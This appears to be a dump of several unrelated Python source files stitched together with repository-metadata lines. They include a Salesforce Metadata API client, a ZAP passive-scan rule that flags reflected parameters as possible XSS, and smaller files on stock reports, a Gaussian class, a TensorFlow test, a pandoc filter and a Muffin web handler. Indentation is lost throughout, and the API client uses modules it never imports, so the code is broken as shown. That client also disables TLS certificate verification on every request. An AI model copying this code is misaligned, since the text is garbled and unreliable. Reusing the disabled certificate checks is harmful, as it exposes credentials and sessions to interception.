from xml.sax.saxutils import unescape, quoteattr
from .. import xmltodict
from ..soap import SOAP
from ..login import soap_login, rest_login
from ... import requests, util
from ..lib.panel import Printer
class MetadataApi:
def __init__(self, settings, **kwargs):
self.settings = settings
self.api_version = settings["api_version"]
self.deploy_options = settings["deploy_options"]
self.soap = SOAP(settings)
self.session = None
self.result = None
def login(self, session_id_expired=False):
""" Login with default project credentials
Arguments:
        * session_id_expired -- Optional; set to True when the session cached in
            .config/session.json has expired, for example when an INVALID_SESSION_ID
            error was returned for a request made with that session, so that this
            method forces a fresh login
        Returns:
        * result -- the session info; if `output_session_info` is True in the plugin
            settings, the session info is also written to the console
"""
if self.settings["login_type"] == "REST":
result = rest_login(self.settings, session_id_expired)
else:
result = soap_login(self.settings, session_id_expired)
if not result["success"]:
self.result = result
return self.result
self.metadata_url = result["instance_url"] + "/services/Soap/m/%s.0" % self.api_version
self.headers = {
"Content-Type": "text/xml;charset=UTF-8",
"SOAPAction": '""'
}
self.result = result
return result
def _invoke_method(self, _method, options={}):
""" Support below methods:
* describeMetadata
* readMetadata
* renameMetadata
* deleteMetadata
* cancelDeployment
"""
result = self.login()
if not result["success"]:
self.result = result
return self.result
# Build soap_body
body = self.soap.create_request(_method, options)
try:
response = requests.post(self.metadata_url,
body, verify=False, headers=self.headers)
except requests.exceptions.RequestException as e:
self.result = {
"Error Message": "Connection Timeout",
"success": False
}
return self.result
# If status_code is > 399, which means it has error
if response.status_code > 399:
# If session is invalid, force to login and execute this again
if "INVALID_SESSION_ID" in response.text:
Printer.get("log").write("Session is expired, need login again")
self.login(True)
return self._invoke_method(_method, options)
self.result = util.get_response_error(response)
return self.result
result = xmltodict.parse(response.content)
self.result = result["soapenv:Envelope"]["soapenv:Body"][_method + "Response"]["result"]
self.result["success"] = True
return self.result
def check_status(self, async_process_id, timeout=120):
""" Ensure the retrieve request is done and then we can
continue other work
* async_process_id -- retrieve request asyncProcessId
"""
# Headers and Body
headers = self.headers.copy()
headers["Accept-Encoding"] = "identity, deflate, compress, gzip"
soap_body = self.soap.create_request('check_status', {
"async_process_id": async_process_id
})
try:
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=10)
session.mount(self.metadata_url, adapter)
response = session.post(self.metadata_url, soap_body, verify=False,
headers=headers, timeout=timeout)
except requests.exceptions.RequestException as e:
self.result = {
"Error Message": "Network connection timeout when checking status for retrieve",
"success": False
}
return self.result
# If status_code is > 399, which means it has error
if response.status_code > 399:
self.result = util.get_response_error(response)
return self.result
result = xmltodict.parse(response.content)
self.result = result["soapenv:Envelope"]["soapenv:Body"]["checkStatusResponse"]["result"]
self.result["success"] = True
return self.result
def check_retrieve_status(self, async_process_id):
""" After async process is done, post a checkRetrieveStatus to
obtain the zipFile(base64)
Arguments:
* async_process_id -- asyncProcessId of retrieve request
"""
headers = self.headers.copy()
headers["Accept-Encoding"] = "identity, deflate, compress, gzip"
soap_body = self.soap.create_request('check_retrieve_status', {
"async_process_id": async_process_id
})
try:
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=10)
session.mount(self.metadata_url, adapter)
response = session.post(self.metadata_url, soap_body,
verify=False, headers=headers, timeout=120)
except requests.exceptions.RequestException as e:
self.result = {
"Error Message": "Network connection timeout when checking retrieve status",
"success": False
}
return self.result
# If status_code is > 399, which means it has error
if response.status_code > 399:
self.result = util.get_response_error(response)
return self.result
result = xmltodict.parse(response.content)
result = result["soapenv:Envelope"]["soapenv:Body"]["checkRetrieveStatusResponse"]["result"]
result["success"] = response.status_code < 399
return result
def retrieve(self, options, timeout=120):
""" 1. Issue a retrieve request to start the asynchronous retrieval and asyncProcessId is returned
2. Issue a checkRetrieveStatus request to check whether the async process job is completed.
3. After the job is completed, you will get the zipFile(base64)
4. Use Python Lib base64 to convert the base64 string to zip file.
5. Use Python Lib zipFile to unzip the zip file to path
Arguments:
* options -- {"types" : types_dict, "package_names": package_names}
"""
result = self.login()
if not result or not result["success"]:
self.result = result
return self.result
# Log the StartTime
start_time = datetime.datetime.now()
# Write a separate line
Printer.get('log').write_start()
        # Before building the soap_body, we need to check whether each type supports *;
        # if not, we need to list package for it
list_package_for_all = False
if "list_package_for_all" in options and options["list_package_for_all"]:
list_package_for_all = True
records = self.prepare_members(options["types"], list_package_for_all)
# Add types for options
_types = {}
for k, values in records.items():
if "*" in values:
_types[k] = values
else:
members = []
for v in values:
if isinstance(v, str):
members.append(v)
elif isinstance(v, dict):
members.append(v["fullName"])
_types[k] = members
options["types"] = _types
# [sf:retrieve]
Printer.get('log').write("[sf:retrieve] Start request for a retrieve...")
# Build soap_body
soap_body = self.soap.create_request('retrieve', options)
# Post retrieve request
try:
response = requests.post(self.metadata_url, soap_body, verify=False,
headers=self.headers, timeout=120)
except requests.exceptions.RequestException as e:
self.result = {
"Error Message": "Network connection timeout when issuing retrieve request",
"success": False
}
return self.result
# Check whether session_id is expired
if "INVALID_SESSION_ID" in response.text:
Printer.get('log').write("[sf:retrieve] Session expired, need login again")
result = self.login(True)
if not result["success"]:
self.result = result
return self.result
return self.retrieve(options)
# If status_code is > 399, which means it has error
if response.status_code > 399:
self.result = util.get_response_error(response)
return self.result
# [sf:retrieve]
Printer.get('log').write("[sf:retrieve] Request for a retrieve submitted successfully.")
# Get async process id
async_process_id = util.getUniqueElementValueFromXmlString(response.content, "id")
# [sf:retrieve]
Printer.get('log').write("[sf:retrieve] Request ID for the current retrieve task: "+async_process_id)
Printer.get('log').write("[sf:retrieve] Waiting for server to finish processing the request...")
# Check status until retrieve request is finished
done = "false"
while done == "false":
            # Issue a status request to obtain the retrieve result
            # Before API version 31 we had to call check_status first; since version 31,
            # check_retrieve_status alone returns the current status
if self.settings["api_version"] >= 31:
result = self.check_retrieve_status(async_process_id)
else:
result = self.check_status(async_process_id)
# Catch exception of status retrieving
if not result or not result["success"]:
self.result = result
return self.result
status = result["state"] if self.api_version < 31 else result["status"]
done = result["done"]
# Display retrieve status in the output panel
Printer.get('log').write("[sf:retrieve] Request Status: %s" % status)
            # Wait before issuing the next request, depending on the current status
sleep_seconds = 2 if status in ["Queued", "Pending", "Succeeded"] else self.settings["metadata_polling_frequency"]
time.sleep(sleep_seconds)
# If check status request failed, this will not be done
if status == "Failed":
Printer.get('log').write("[sf:retrieve] Request Failed") # [sf:retrieve]
self.result = {
"success": False,
"Error Message": result["errorMessage"]
}
return self.result
        # Before API version 31, a separate checkRetrieveStatus request is required
        # to obtain the ZipFile; since version 31 it was already issued in the loop above
if self.api_version < 31:
Printer.get('log').write("[sf:retrieve] Obtaining ZipFile...")
result = self.check_retrieve_status(async_process_id)
# Catch exception of status retrieve
if not result["success"]:
self.result = result
return self.result
# Output the message if have
if "messages" in result:
messages = result["messages"]
if isinstance(messages, dict):
messages = [messages]
for message in messages:
Printer.get('log').write("[sf:retrieve] %s - %s" % (
message["fileName"],
message["problem"]
))
# [sf:retrieve]
Printer.get('log').write("[sf:retrieve] Finished request %s successfully." % async_process_id)
# Build Successful
Printer.get('log').write("\n\nBUILD SUCCESSFUL", False)
# Total time
total_seconds = (datetime.datetime.now() - start_time).seconds
Printer.get('log').write("Total time: %s seconds" % total_seconds, False)
# print('meta retrive result', result)
self.result = result
def prepare_members(self, _types, list_package_for_all=False):
        result = self.login()
        if not result or not result["success"]:
            return
if list_package_for_all:
Printer.get("log").write_start()
# List package for metadata objects which 'inFolder' is true
# EmailFolder, DocumentFolder, DashboardFolder and ReportFolder
records = []
for _type in _types:
if "*" not in _types[_type]:
continue
if _type in self.settings["metadata_objects_in_folder"]:
# List package for ``suffix.capitalize() + 'Folder'``
metadata_object = _type + "Folder" if _type != "EmailTemplate" else "EmailFolder"
# Waiting message in output console
Printer.get("log").write("[sf:retrieve] List Folders for %s" % metadata_object)
# Collect all folders into records
folders = []
elements = []
for record in self.list_package({metadata_object : [""]}):
elements.append({
"id": record["id"],
"fullName": record["fullName"],
"lastModifiedDate": record["lastModifiedDate"],
"lastModifiedById": record["lastModifiedById"],
"lastModifiedByName": record["lastModifiedByName"]
})
folders.append(record["fullName"])
for _folders in util.list_chunks(folders, 3):
Printer.get("log").write("[sf:retrieve] Fetching component metadata for %s Folder: %s" % (
_type, ", ".join(_folders)
))
# Add file in folders into retrieve list
for record in self.list_package({_type : _folders}):
detail = {
"id": record["id"],
"fullName": record["fullName"],
"lastModifiedDate": record["lastModifiedDate"],
"lastModifiedById": record["lastModifiedById"],
"lastModifiedByName": record["lastModifiedByName"]
}
elements.append(detail)
elements = sorted(elements, key=lambda k : k['fullName'])
_types[_type] = elements
        # In order to speed up the retrieve request, we do not list package for these
        # types by default; only when we want a full copy or to build package.xml
        # do we call list_package for all of them
        # Note: CustomObject must be retrieved by a ``list_package`` request
# list package for metadata object which supports wildcard retrieve
_types_list = []
# print("retrieve types: ", _types)
if not list_package_for_all:
if "CustomObject" in _types and "*" in _types["CustomObject"]:
_types_list.append("CustomObject")
if "InstalledPackage" in _types and "*" in _types["InstalledPackage"]:
_types_list.append("InstalledPackage")
else:
for _type in _types:
if "*" not in _types[_type]:
continue
if _type not in self.settings["metadata_objects_in_folder"]:
_types_list.append(_type)
# Sort _types_list
_types_list = sorted(_types_list)
        # Each list_package request accepts at most 3 metadata types,
        # so we need to chunk the list into smaller pieces
for _trunked_types_list in util.list_chunks(_types_list, 3):
_trunked_types = {}
for t in _trunked_types_list:
_trunked_types[t] = [""]
# Define type_with_elements for keeping files for _trunked_types
type_with_elements = {}
# list package for all non-folder metadata types
Printer.get("log").write("[sf:retrieve] Fetching component metadata for %s" % (
", ".join(_trunked_types)
))
for record in self.list_package(_trunked_types):
_type = record["type"]
# StandardValueSetTranslation doesn't have type?
if isinstance(record["type"], dict):
_type = "StandardValueSetTranslation"
detail = {
"id": record.get("id", ""),
"fullName": record["fullName"],
"lastModifiedDate": record["lastModifiedDate"],
"lastModifiedById": record["lastModifiedById"],
"lastModifiedByName": record["lastModifiedByName"]
}
if _type not in type_with_elements:
type_with_elements[_type] = [detail]
else:
type_with_elements[_type].append(detail)
# Order elements
for t in type_with_elements:
type_with_elements[t] = sorted(type_with_elements[t], key=lambda k : k['fullName'])
# Update _types with result of list_package request
for _type in _trunked_types:
if _type in type_with_elements:
_types[_type] = type_with_elements[_type]
else:
_types[_type] = []
# After reload is finished
if list_package_for_all:
Printer.get("log").write("Project cache is saved to local .config/package.json")
# Invoked by thread
self.result = {
"success": True,
"types": _types
}
# Invoked by retrieve request
return _types
def list_package(self, _types):
# Build soap_body
soap_body = self.soap.create_request('list_package', {"types": _types})
try:
response = requests.post(self.metadata_url, soap_body,
verify=False, headers=self.headers)
except requests.exceptions.RequestException as e:
Printer.get("log").write("Connection timeout when list package for %s" % (
", ".join(list(_types.keys()))
))
return []
# If status_code is > 399, which means it has error
if response.status_code > 399:
if "INVALID_SESSION_ID" in response.text:
Printer.get("log").write("Session is expired, need login again")
self.login(True)
return self.list_package(_types)
result = util.get_response_error(response)
Printer.get("log").write("Error happened when list package for %s, detail reason: %s" % (
", ".join(list(_types.keys())), result.get("Error Message", "Unknown Reason")
))
return []
result = xmltodict.parse(response.content)
result = result["soapenv:Envelope"]["soapenv:Body"]["listMetadataResponse"]
if not result or "result" not in result:
return []
result = result["result"]
if isinstance(result, dict):
result = [result]
self.result = result
return result
def check_deploy_status(self, async_process_id):
""" After async process is done, post a checkDeployResult to
get the deploy result
Arguments:
* async_process_id -- retrieve request asyncProcessId
"""
soap_body = self.soap.create_request('check_deploy_status', {
"async_process_id": async_process_id
})
response = requests.post(self.metadata_url, soap_body,
headers=self.headers, verify=False, timeout=120)
# If status_code is > 399, which means it has error
if response.status_code > 399:
self.result = util.get_response_error(response)
return self.result
result = xmltodict.parse(response.content)
try:
header = None
if "soapenv:Header" in result["soapenv:Envelope"]:
header = result["soapenv:Envelope"]["soapenv:Header"]["DebuggingInfo"]
result = result["soapenv:Envelope"]["soapenv:Body"]["checkDeployStatusResponse"]["result"]
result = {
"success": True,
"header": header,
"body": result
}
except KeyError as ke:
result = {
"Message": "Convert Xml to JSON Exception: " + str(ke),
"success": False
}
return result
def deploy(self, base64_zip, test_classes=[]):
""" Deploy zip file
Arguments:
        * base64_zip -- base64 encoded zip file
"""
result = self.login()
if not result or not result["success"]: return
# Log the StartTime
start_time = datetime.datetime.now()
# Populate the soap_body with actual options
        # the deploy options were moved into class attributes for easier manipulation
# deploy_options = self.settings["deploy_options"]
# If just checkOnly, output VALIDATE, otherwise, output DEPLOY
deploy_or_validate = "validate" if self.deploy_options["checkOnly"] else "deploy"
# [sf:deploy]
Printer.get('log').write_start().write("[sf:%s] Start request for a deploy..." % deploy_or_validate)
options = self.deploy_options
options["zipfile"] = base64_zip
# If testLevel is Run Specified Test,
# we need to specify the runTests
testLevel = options.get("testLevel", "NoTestRun")
if testLevel == "RunSpecifiedTests":
options["runTests"] = "\n".join([
"<met:runTests>%s</met:runTests>" % c for c in test_classes
])
soap_body = self.soap.create_request('deploy', options)
try:
response = requests.post(self.metadata_url, soap_body,
verify=False, headers=self.headers)
except requests.exceptions.RequestException as e:
self.result = {
"Error Message": "Network connection timeout when issuing deploy request",
"success": False
}
return self.result
# Check whether session_id is expired
if "INVALID_SESSION_ID" in response.text:
Printer.get('log').write("[sf:%s] Session expired, need login again" % deploy_or_validate)
result = self.login(True)
if not result["success"]:
self.result = result
return self.result
            return self.deploy(base64_zip, test_classes)
        # If status_code is > 399, which means it has error
if response.status_code > 399:
self.result = util.get_response_error(response)
return self.result
# [sf:deploy]
Printer.get('log').write("[sf:%s] Request for a deploy submitted successfully." % deploy_or_validate)
# Get async process id
async_process_id = util.getUniqueElementValueFromXmlString(response.content, "id")
# [sf:deploy]
Printer.get('log').write("[sf:%s] Request ID for the current deploy task: %s" % (deploy_or_validate, async_process_id))
Printer.get('log').write("[sf:%s] Waiting for server to finish processing the request..." % deploy_or_validate)
# 2. issue a check status loop request to assure the async
# process is done
result = self.check_deploy_status(async_process_id)
body = result["body"]
index = 1
failure_dict = {}
while body["status"] in ["Pending", "InProgress", "Canceling"]:
if "stateDetail" in body:
if int(body["numberComponentsDeployed"]) < int(body["numberComponentsTotal"]):
Printer.get('log').write("[sf:%s] Request Status: %s (%s/%s) -- %s" % (
deploy_or_validate,
body["status"],
body["numberComponentsDeployed"],
body["numberComponentsTotal"],
body["stateDetail"]
))
else:
Printer.get('log').write("[sf:%s] TestRun Status: %s (%s/%s) -- %s" % (
deploy_or_validate,
body["status"],
body["numberTestsCompleted"],
body["numberTestsTotal"],
body["stateDetail"]
))
else:
Printer.get('log').write("[sf:%s] Request Status: %s" % (
deploy_or_validate, body["status"]
))
# Process Test Run Result
if "runTestResult" in body["details"] and \
"failures" in body["details"]["runTestResult"]:
failures = body["details"]["runTestResult"]["failures"]
if isinstance(failures, dict):
if failures["id"] not in failure_dict:
failure_dict[failures["id"]] = failures
Printer.get('log').write("-" * 84).write("Test Failures: ")
Printer.get('log').write("%s.\t%s" % (index, failures["message"]))
for msg in failures["stackTrace"].split("\n"):
Printer.get('log').write("\t%s" % msg)
# [sf:deploy]
Printer.get('log').write("-" * 84)
                        index += 1
elif isinstance(failures, list):
for f in failures:
if f["id"] not in failure_dict:
failure_dict[f["id"]] = f
Printer.get('log').write("-" * 84).write("Test Failures: ")
Printer.get('log').write("%s.\t%s" % (index, f["message"]))
                            # If it is a compile error, there will be no stack trace
if isinstance(f["stackTrace"], str):
for msg in f["stackTrace"].split("\n"):
Printer.get('log').write("\t%s" % msg)
Printer.get('log').write("-" * 84)
index += 1
# Thread Wait
sleep_seconds = 2 if body["status"] == "Pending" else self.settings["metadata_polling_frequency"]
time.sleep(sleep_seconds)
result = self.check_deploy_status(async_process_id)
body = result["body"]
# Check if job is canceled
if body["status"] == "Canceled":
Printer.get('log').write("\nBUILD FAILED", False)
Printer.get('log').write("*********** DEPLOYMENT FAILED ***********", False)
Printer.get('log').write("Request ID: %s" % async_process_id, False)
Printer.get('log').write("\nRequest Canceled", False)
Printer.get('log').write("*********** DEPLOYMENT FAILED ***********", False)
# If check status request failed, this will not be done
elif body["status"] == "Failed":
# Append failure message
Printer.get('log').write("[sf:%s] Request Failed\n\nBUILD FAILED" % deploy_or_validate)
Printer.get('log').write("*********** DEPLOYMENT FAILED ***********", False)
Printer.get('log').write("Request ID: %s" % async_process_id, False)
# Output Failure Details
failures_messages = []
if "componentFailures" in body["details"]:
component_failures = body["details"]["componentFailures"]
if isinstance(component_failures, dict):
component_failures = [component_failures]
for index in range(len(component_failures)):
component_failure = component_failures[index]
failures_messages.append("%s. %s -- %s: %s (line %s column %s)" % (
index + 1,
component_failure["fileName"],
component_failure["problemType"],
component_failure["problem"],
component_failure["lineNumber"] \
if "lineNumber" in component_failure else "N/A",
component_failure["columnNumber"] \
if "columnNumber" in component_failure else "N/A"
))
elif "runTestResult" in body["details"]:
failures = body["details"]["runTestResult"].get("failures", [])
if isinstance(failures, dict):
failures = [failures]
for index in range(len(failures)):
failure = failures[index]
failures_messages.append("%s. %s -- %s: %s" % (
index + 1,
failure.get("type"),
failure.get("name"),
failure.get("message")
))
# Unknown exception printer
if "errorMessage" in body:
Printer.get('log').write("\n" + body["errorMessage"], False)
warning_messages = []
if "runTestResult" in body["details"]:
runTestResult = body["details"]["runTestResult"]
if "codeCoverageWarnings" in runTestResult:
coverage_warnings = runTestResult["codeCoverageWarnings"]
if isinstance(runTestResult["codeCoverageWarnings"], dict):
coverage_warnings = [coverage_warnings]
elif isinstance(runTestResult["codeCoverageWarnings"], list):
coverage_warnings = coverage_warnings
for warn in coverage_warnings:
if not isinstance(warn["name"], str): continue
warning_messages.append("%s -- %s" % (warn["name"], warn["message"]))
# Output failure message
if failures_messages:
Printer.get('log').write("\n\nAll Component Failures:", False)
Printer.get('log').write("\n"+"\n\n".join(failures_messages), False)
# Output warning message
if warning_messages:
Printer.get('log').write("\n\nTest Coverage Warnings:", False)
Printer.get('log').write("\n"+"\n".join(warning_messages), False)
# End for Deploy Result
Printer.get('log').write("\n*********** %s FAILED ***********" % (
deploy_or_validate.upper()), False)
else:
# Append succeed message
Printer.get('log').write("\n[sf:%s] Request Succeed" % deploy_or_validate, False)
Printer.get('log').write("[sf:%s] *********** %s SUCCEEDED ***********" % (
deploy_or_validate, deploy_or_validate.upper()), False)
Printer.get('log').write("[sf:%s] Finished request %s successfully." % (
deploy_or_validate, async_process_id), False)
# Total time
total_seconds = (datetime.datetime.now() - start_time).seconds
Printer.get('log').write("\n\nTotal time: %s seconds" % total_seconds, False)
# # Display debug log message in the new view
# view = sublime.active_window().new_file()
# view.run_command("new_view", {
# "name": "Debugging Information",
# "input": result.get("header", {}).get("debugLog", "")
# })
self.result = result |
passive/find_reflected_params.py | knassar702/community-scripts | 629 | 12685379 | <reponame>knassar702/community-scripts
"""
looks for parameter values that are reflected in the response.
Author: <EMAIL>
The scan function will be called for request/response made via ZAP, excluding some of the automated tools
Passive scan rules should not make any requests
Note that new passive scripts will initially be disabled
Right click the script in the Scripts tree and select "enable"
Refactored & Improved by nil0x42
"""
# Set to True if you want to see results on a per param basis
# (i.e.: A single URL may be listed more than once)
RESULT_PER_FINDING = False
# Ignore parameters whose value is too short
MIN_PARAM_VALUE_LENGTH = 8
def scan(ps, msg, src):
# Docs on alert raising function:
# raiseAlert(int risk, int confidence, str name, str description, str uri,
# str param, str attack, str otherInfo, str solution,
# str evidence, int cweId, int wascId, HttpMessage msg)
# risk: 0: info, 1: low, 2: medium, 3: high
# confidence: 0: falsePositive, 1: low, 2: medium, 3: high, 4: confirmed
alert_title = "Reflected HTTP GET parameter(s) (script)"
alert_desc = ("Reflected parameter value has been found. "
"A reflected parameter values may introduce XSS "
"vulnerability or HTTP header injection.")
uri = header = body = None
reflected_params = []
for param in msg.getUrlParams():
value = param.getValue()
if len(value) < MIN_PARAM_VALUE_LENGTH:
continue
if not header:
uri = msg.getRequestHeader().getURI().toString()
header = msg.getResponseHeader().toString()
body = msg.getResponseBody().toString()
if value in header or value in body:
if RESULT_PER_FINDING:
param_name = param.getName()
ps.raiseAlert(0, 2, alert_title, alert_desc, uri, param_name,
None, None, None, value, 0, 0, msg)
else:
reflected_params.append(param.getName())
if reflected_params and not RESULT_PER_FINDING:
reflected_params = u",".join(reflected_params)
ps.raiseAlert(0, 2, alert_title, alert_desc, uri, reflected_params,
None, None, None, None, 0, 0, msg)
|
examples/reports/report_stats.py | vishalbelsare/zvt | 2,032 | 12685385 | # -*- coding: utf-8 -*-
import logging
from apscheduler.schedulers.background import BackgroundScheduler
from examples.report_utils import report_top_stats
from zvt import init_log
logger = logging.getLogger(__name__)
sched = BackgroundScheduler()
@sched.scheduled_job("cron", hour=19, minute=30, day_of_week="mon-fri")
def report_stats():
report_top_stats(
entity_type="stock",
entity_provider="em",
data_provider="em",
periods=[7, 30, 180, 365],
ignore_new_stock=True,
adjust_type=None,
top_count=30,
turnover_threshold=100000000,
turnover_rate_threshold=0.02,
em_group_over_write=True,
)
report_top_stats(
entity_type="stockhk",
entity_provider="em",
data_provider="em",
top_count=30,
periods=[7, 30, 180, 365],
ignore_new_stock=True,
adjust_type=None,
turnover_threshold=100000000,
turnover_rate_threshold=0.005,
em_group_over_write=False,
)
if __name__ == "__main__":
init_log("report_stats.log")
report_stats()
sched.start()
sched._thread.join()
|
merlin/gaussian.py | goodmami/pywsd | 581 | 12685393 | #!/usr/bin/python -*- coding: utf-8 -*-
#
# Merlin - Almost Native Python Machine Learning Library: Gaussian Distribution
#
# Copyright (C) 2014-2015 alvations
# URL:
# For license information, see LICENSE.md
import numpy as np
"""
Class for univariate gaussian
p(x) = 1/sqrt(2*pi*sigma^2) * e^(-(x-mu)^2 / (2*sigma^2))
Where mu is the gaussian mean, and sigma^2 is the gaussian variance
"""
class Gaussian:
def __init__(self,mean,variance):
self.mean = mean;
self.variance = variance;
def sample(self,points):
        # np.random.normal expects the standard deviation as its scale parameter
        return np.random.normal(self.mean,np.sqrt(self.variance),points)
def estimate_gaussian(X):
"""
Returns the mean and the variance of a data set of X points assuming that
the points come from a gaussian distribution X.
"""
mean = np.mean(X,0)
variance = np.var(X,0)
return Gaussian(mean,variance) |
distributed/http/__init__.py | bnavigator/distributed | 1,358 | 12685410 | <gh_stars>1000+
from .utils import get_handlers
|
bookwyrm/migrations/0149_merge_20220526_1716.py | mouse-reeve/fedireads | 270 | 12685428 | <gh_stars>100-1000
# Generated by Django 3.2.13 on 2022-05-26 17:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("bookwyrm", "0148_alter_user_preferred_language"),
("bookwyrm", "0148_merge_20220326_2006"),
]
operations = []
|
research/domain_adaptation/domain_separation/grl_ops_test.py | 873040/Abhishek | 3,326 | 12685444 | # Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for grl_ops."""
#from models.domain_adaptation.domain_separation import grl_op_grads # pylint: disable=unused-import
#from models.domain_adaptation.domain_separation import grl_op_shapes # pylint: disable=unused-import
import tensorflow as tf
import grl_op_grads
import grl_ops
FLAGS = tf.app.flags.FLAGS
class GRLOpsTest(tf.test.TestCase):
def testGradientReversalOp(self):
with tf.Graph().as_default():
with self.test_session():
# Test that in forward prop, gradient reversal op acts as the
# identity operation.
examples = tf.constant([5.0, 4.0, 3.0, 2.0, 1.0])
output = grl_ops.gradient_reversal(examples)
expected_output = examples
self.assertAllEqual(output.eval(), expected_output.eval())
# Test that shape inference works as expected.
self.assertAllEqual(output.get_shape(), expected_output.get_shape())
# Test that in backward prop, gradient reversal op multiplies
# gradients by -1.
examples = tf.constant([[1.0]])
w = tf.get_variable(name='w', shape=[1, 1])
b = tf.get_variable(name='b', shape=[1])
init_op = tf.global_variables_initializer()
init_op.run()
features = tf.nn.xw_plus_b(examples, w, b)
# Construct two outputs: features layer passes directly to output1, but
# features layer passes through a gradient reversal layer before
# reaching output2.
output1 = features
output2 = grl_ops.gradient_reversal(features)
gold = tf.constant([1.0])
loss1 = gold - output1
loss2 = gold - output2
opt = tf.train.GradientDescentOptimizer(learning_rate=0.01)
grads_and_vars_1 = opt.compute_gradients(loss1,
tf.trainable_variables())
grads_and_vars_2 = opt.compute_gradients(loss2,
tf.trainable_variables())
self.assertAllEqual(len(grads_and_vars_1), len(grads_and_vars_2))
for i in range(len(grads_and_vars_1)):
g1 = grads_and_vars_1[i][0]
g2 = grads_and_vars_2[i][0]
# Verify that gradients of loss1 are the negative of gradients of
# loss2.
self.assertAllEqual(tf.negative(g1).eval(), g2.eval())
if __name__ == '__main__':
tf.test.main()
|
filters/numenvs.py | adamgayoso/scvi-tools-handbook | 150 | 12685451 | <reponame>adamgayoso/scvi-tools-handbook<filename>filters/numenvs.py
#!/usr/bin/env python3
"""
Simple pandoc filter to create flexible environments in markdown. Style of
environments controlled via latex environment definitions or css for html.
Numbered theorem environment example:
begin-Theorem
$2+2=4$
end-Theorem
Unnumbered environment:
begin+Example
This.
end+Example
The `begin` and `end` statements must be at the beginning of a new paragraph.
"""
from pandocfilters import toJSONFilter, RawBlock
env_counts = {}
def html(string):
"""Return html block from string."""
return RawBlock('html', string)
def latex(string):
"""Return latex block from string."""
return RawBlock('latex', string)
def parse_env_latex(key, value):
"""Parse paragraph opening to extract environment name."""
if key == 'Para':
if len(value) >= 1:
content = value[0]['c']
if content[:6] == 'begin+' or content[:6] == 'begin-':
return 'begin', content[6:]
if content[:4] == 'end-' or content[:4] == 'end+':
return 'end', content[4:]
return '', ''
def parse_env_html(key, value):
"""Parse paragraph opening to extract environment name."""
if key == 'Para':
if len(value) >= 1:
content = value[0]['c']
if content[:6] == 'begin-':
global env_counts
name = content[6:]
if name in env_counts:
env_counts[name] += 1
else:
env_counts[name] = 1
return 'begin', name, env_counts[name]
if content[:6] == 'begin+':
name = content[6:]
return 'begin', name, None
if content[:4] == 'end-' or content[:4] == 'end+':
return 'end', content[4:], None
return '', '', None
def num_envs_latex(key, value):
"""Create numbered divs environments."""
instr, label = parse_env_latex(key, value)
if instr == 'begin':
return latex('\\begin{%s}\n' % label)
if instr == 'end':
return latex('\\end{%s}\n' % label)
def num_envs_html(key, value):
"""Create numbered divs environments."""
instr, label, num = parse_env_html(key, value)
if instr == 'begin':
if num:
title = label + ' ' + str(num)
else:
title = label
return [html('<div class="numenv %s">' % label),
html('<span class="numenv %s title">%s.</span>' % (label, title))]
if instr == 'end':
return html('</div>')
#pylint: disable=unused-argument
def num_envs(key, value, fmt, meta):
"""Select action based on format."""
if fmt == 'html5':
return num_envs_html(key, value)
if fmt == 'latex':
return num_envs_latex(key, value)
return None
if __name__ == "__main__":
toJSONFilter(num_envs)
|
muffin/handler.py | klen/muffin | 704 | 12685470 | <reponame>klen/muffin
"""Muffin Handlers."""
import inspect
import typing as t
from http_router import Router
from http_router.typing import TYPE_METHODS
from asgi_tools import Request
from asgi_tools.app import HTTPView, HTTP_METHODS
from asgi_tools.utils import is_awaitable
class HandlerMeta(type):
"""Prepare handlers."""
def __new__(mcs, name, bases, params):
"""Prepare a Handler Class."""
cls = super().__new__(mcs, name, bases, params)
# Ensure that the class methods are exist and iterable
if not cls.methods:
cls.methods = set(method for method in HTTP_METHODS if method.lower() in cls.__dict__)
elif isinstance(cls.methods, str):
cls.methods = [cls.methods]
cls.methods = set(method.upper() for method in cls.methods)
for m in cls.methods:
method = getattr(cls, m.lower(), None)
if method and not is_awaitable(method):
raise TypeError(f"The method '{method.__qualname__}' has to be awaitable")
return cls
def route_method(*paths: str, **params) -> t.Callable:
"""Mark a method as a route."""
def wrapper(method):
"""Wrap a method."""
method.__route__ = paths, params
return method
return wrapper
class Handler(HTTPView, metaclass=HandlerMeta):
"""Class-based view pattern for handling HTTP method dispatching.
.. code-block:: python
@app.route('/hello', '/hello/{name}')
class HelloHandler(Handler):
async def get(self, request):
                name = request.path_params.get('name') or 'all'
                return f"GET: Hello {name}"
            async def post(self, request):
                name = request.path_params.get('name') or 'all'
                return f"POST: Hello {name}"
@Handler.route('/hello/custom')
async def custom(self, request):
return 'Custom HELLO'
# ...
async def test_my_endpoint(client):
response = await client.get('/hello')
assert await response.text() == 'GET: Hello all'
response = await client.get('/hello/john')
assert await response.text() == 'GET: Hello john'
response = await client.post('/hello')
assert await response.text() == 'POST: Hello all'
response = await client.get('/hello/custom')
assert await response.text() == 'Custom HELLO'
response = await client.delete('/hello')
assert response.status_code == 405
"""
methods: t.Optional[t.Sequence[str]] = None
@classmethod
def __route__(cls, router: Router, *paths: str, methods: TYPE_METHODS = None, **params):
"""Check for registered methods."""
router.bind(cls, *paths, methods=methods or cls.methods, **params)
for _, method in inspect.getmembers(cls, lambda m: hasattr(m, '__route__')):
cpaths, cparams = method.__route__
router.bind(cls, *cpaths, __meth__=method.__name__, **cparams)
return cls
def __call__(self, request: Request, *args, **opts) -> t.Awaitable:
"""Dispatch the given request by HTTP method."""
method = getattr(self, opts.get('__meth__') or request.method.lower())
return method(request)
route = route_method
|
src/tools/python/deps-to-manifest.py | michel-slm/breakpad | 2,151 | 12685496 | #!/usr/bin/python
# Copyright 2016 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
